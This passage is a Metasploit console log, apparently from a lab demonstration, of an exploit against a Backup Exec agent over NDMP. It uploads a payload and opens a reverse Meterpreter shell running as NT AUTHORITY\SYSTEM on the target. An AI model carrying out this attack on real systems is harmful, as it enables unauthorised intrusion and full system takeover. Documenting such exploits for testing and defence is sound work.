[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
[*] 172.16.180.141:10000 - Passing SHA authentication
[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 172.16.180.141
[*] Meterpreter session 2 opened (172.16.180.248:4444 -> 172.16.180.141:49630) at 2022-09-12 01:44:44 +0300

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```
